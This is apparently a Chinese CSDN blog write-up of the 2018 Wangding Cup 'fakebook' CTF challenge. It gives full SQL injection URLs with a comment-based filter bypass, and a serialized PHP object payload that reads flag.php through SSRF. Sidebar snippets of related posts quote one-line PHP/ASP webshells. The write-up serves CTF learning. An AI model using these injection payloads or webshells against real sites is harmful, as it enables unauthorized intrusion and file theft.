fakebook--2018网鼎杯--攻防世界wp

最新推荐文章于 2023-09-23 01:32:42 发布
最新推荐文章于 2023-09-23 01:32:42 发布
阅读量265 收藏
点赞数
分类专栏: ctfWP 文章标签: unctf 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/113391655
版权
本文详细描述了一次针对fakebook-2018网鼎杯的网络安全挑战,涉及SQL注入和SSRF漏洞的利用。通过注册、登录及Burpsuite抓包,发现存在get注入和资源泄露。利用信息查询数据库名、表名和列名,并通过反序列化构造payload,最终成功读取服务器上的flag.php文件,解码后得到flag。整个过程展示了黑客可能的攻击路径和技术手段。
摘要由CSDN通过智能技术生成

fakebook–2018网鼎杯

刚打开的样子
在这里插入图片描述
登录不行,先注册。
同时用burp suite 抓包
发现异常包robot.txt
在这里插入图片描述

查看后发现存在泄漏在这里插入图片描述

进入下载文件并查看
在这里插入图片描述
注册后登录,发现将no=不存在的值会报错在这里插入图片描述
在这里插入图片描述
结合user.php.bak发现存在get注入并且可以找到资源的物理路径

用 order by查询字段 当字段为4 返回值正常
查询数据库名

http://220.249.52.134:51172/view.php?no=-6%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()#
在这里插入图片描述

用union select查询表名,union select 被过滤在这里插入图片描述
尝试绕过,绕过成功
查询列名

http://220.249.52.134:51172 /view.php?no=-6 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database()#
在这里插入图片描述

查询字段名

http://220.249.52.134:51172/view.php?no=-6 union/**/select 1,data,3,4 from users#
返回值为序列化的
返回值为序列化的
所以我们可以通过反序列化来实现ssrf读取任意文件,构造我们想要的路径,然后为了绕过正则,不从注册登录的地方下手,直接人为构造联合查询返回语句,data字段在第四个位置。

利用no参数进行注入,在反序列化中构造file文件协议,利用服务端请求伪造漏洞访问服务器上的flag.php文件。

http://220.249.52.134:51172/view.php?no=0//union//select 1,2,3,‘O:8:“UserInfo”:3:{s:4:“name”;s:1:“1”;s:3:“age”;i:1;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}’

查看源码,发现base64编码内容
在这里插入图片描述

D9waHANCg0KJGZsYWcgPSAiZmxhZ3tjMWU1NTJmZGY3NzA0OWZhYmY2NTE2OGYyMmY3YWVhYn0iOw0KZXhpdCgwKTsNCg==
解码
flag{c1e552fdf77049fabf65168f22f7aeab}

在这里插入图片描述

4pri1
关注
专栏目录
【网络安全 | CTFfakebook网鼎杯2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
攻防世界】十九 --- fakebook --- ssrf
qq_43168364的博客
12-29 563
题目 — fakebook 一、writeup 使用dirsearch扫描目录 flag应该在flag.txt文件中 访问robots.txt文件,得到了一个目录 下来了一个文件,user.php.bak。该文件先丢在这里等下再审计,主页没有任何发现,前端代码中没有提示,login.php 也没有找到可以利用的点(可以尝试:sql,xss,逻辑漏洞,写入日志文件,爆破) 来到join.php页面注册了一个admin用户 从首页可以访问到admin用户的页面,发现存在一个查询字符串,其有sql注入漏洞
[网鼎杯 2018]Fakebook -wp
freerats的博客
06-27 401
打开容器,发现页面里有注册页面和登入页面 任意注册一个用户名,进行登入 在blog处发现有xss,一开始研究了半天,然后卡住了,参考别人的wp才发现这道题跟xss没有半毛钱关系。。。 view.php?no=1 在这里是有注入点的 加个引号报错还会爆出绝对路径 发现union被过滤,但/**/union/**/可以绕过 列名 然后查看一下字段 查询到data发现这里面是以序列化的形式储存的 这道题的最关键还是是通过目录扫描发现有robots.txt,进而发现/user.php.bak 其实还可以跑出有f.
[WP/BUU/SSRF/SQLI/反序列化] [网鼎杯 2018]Fakebook解题+分析
車鈊的博客
07-31 269
[网鼎杯 2018]Fakebook 扫描测试,robots.txt 可读 User-agent: * Disallow: /user.php.bak 下载,源代码展示了UserInfo类, <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) {
网鼎杯第三场wp
weixin_30477293的博客
08-27 997
晚上十点更新 十点:https://www.o2oxy.cn/1753.html 转载于:https://www.cnblogs.com/liang2580/p/9543706.html
ctf-第一场网鼎杯
zhang14916的博客
09-04 2255
1.reverse-beijing 放在kali下使用file命令发现这是一个32位的elf文件,直接运行获得一串乱码,放入ida中找到main函数进行反编译,发现里面有嵌套函数,打开嵌套函数,发现函数是根据外层参数做异或,猜测这里是将flag顺序打乱后与一个密钥做异或得到我们所看到的乱码,将做异或的两行数据取出再按外层函数调用参数选定的顺序排好即可(注意有部分参数不存在是因为他们的值为0而未被...
网鼎杯一道web题(wafUpload)
洞若观火
08-23 1431
思路:burpsuite截取post数据包,上传木马,菜刀连接。 截取上传的数据包,对filename参数使用数组绕过,上传php.php,同时得到php.php路径。 附: PHP一句话木马:&lt;?php @eval($_POST['key']);?&gt; ASP一句话木马:&lt;%eval request['key']%&gt; ASPX一句话木马:&lt;%@ Page L...
buuctf-[网鼎杯 2018]Fakebook
qq_42728977的博客
12-17 1142
[网鼎杯 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
[网鼎杯 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1761
[网鼎杯 2018]Fakebook 解题思路&过程
网鼎杯-第三场-加解密-hafuhafu正确版
08-27
2018年8月27日网鼎杯|第三场|加解密
Bugku Crpyto writeup --Not_only_base
10-09 651
密文MCJIJSGKP=ZZYXZXRMU=W3YZG3ZZ==G3HQHCUS==使用栅栏位4栏得到==在最后的base码。
记一次CTF入门练习
最新发布
晓梦林的博客
09-23 445
学习CTF有一段时间了,现在做个小小的总结,加深印象。
网鼎杯 MISC--minified wp
qq_30435981的博客
08-21 576
    寻找到 A0和G0的通道的图片,然后通过图片的异或计算,运用stegsolve的combine功能
ctf php168,【2018网鼎杯CTF 第一场】教育组 WP — Lilac
weixin_36255893的博客
04-01 587
Team: Lilac[TOC]misc签到回复公众号即可clip对damaged.disk分析可知包含png图片,提取图片得到了两张图片.修复png文件头, 对图片还原PS等,得到flag:flag{0b008070-eb72-4b99-abed-092075d72a40}webfacebook利用点: sql注入+反序列化+LFRpayload:/view.php?no=0/*123*/Uni...
2018网鼎杯re--beijing writeup
沐沐的博客
08-22 2825
昨天一上午一直在做这道逆向题,这个题目运行起来输出是乱码,就很烦气,一直在搞这个终端的编码问题,搞了半天结果方向错了,然后就放弃了,其实这道题做出来的人还是很多的,还是自己太菜了,感觉自己的re和pwn还是要多加努力学习才行,今天看到writeup来学习下,做一下学习的笔记哈。 拿到这个binary,用file命令看一下,这个binary的基本信息,这是一个32位的elf文件,放到ubuntu下...
2018网(PWN)鼎杯第一场解题记录(Writeup)
SWEET0SWAT的博客
08-21 1万+
MISC   clip     使用十六进制查看软件打开,查找的过程中发现有idat头:       还有一处在下方,表示还有另一张图片      但是这里缺少头部需要手动补充上去再另存文件:      一共提取出两张图片,但是图片明显被处理过了         其实不明白出题人为什么要弄成这样,CTF比赛还要弄成这样纯粹就是刁难,弄得眼睛贼疼。   minified...
[网鼎杯 2018]Fakebook
抒情诗
04-17 381
[网鼎杯 2018]Fakebook 不会,贴大佬的文章 https://blog.csdn.net/qq_42196196/article/details/81952174?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1&utm_source=distribute.pc_re...
强网杯2018 部分web wp
Sp4rkW的博客
03-26 6549
咸鱼web手被大佬虐哭,做又做不来,只能跟着队友躺躺这样子,QWQ 题目质量很高,膜一波FlappyPig的大佬们~ 0x00 web签到 第一层: 特殊子串举例如下: 240610708、QNKCDZO、aabg7XSs、aabC9RqS 直接过 第二层: 传入param[] 数组型,error = error,过 第三层,传入MD5相等文件,附脚本如下: ...
网鼎杯一道web题(fakebook
热门推荐
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值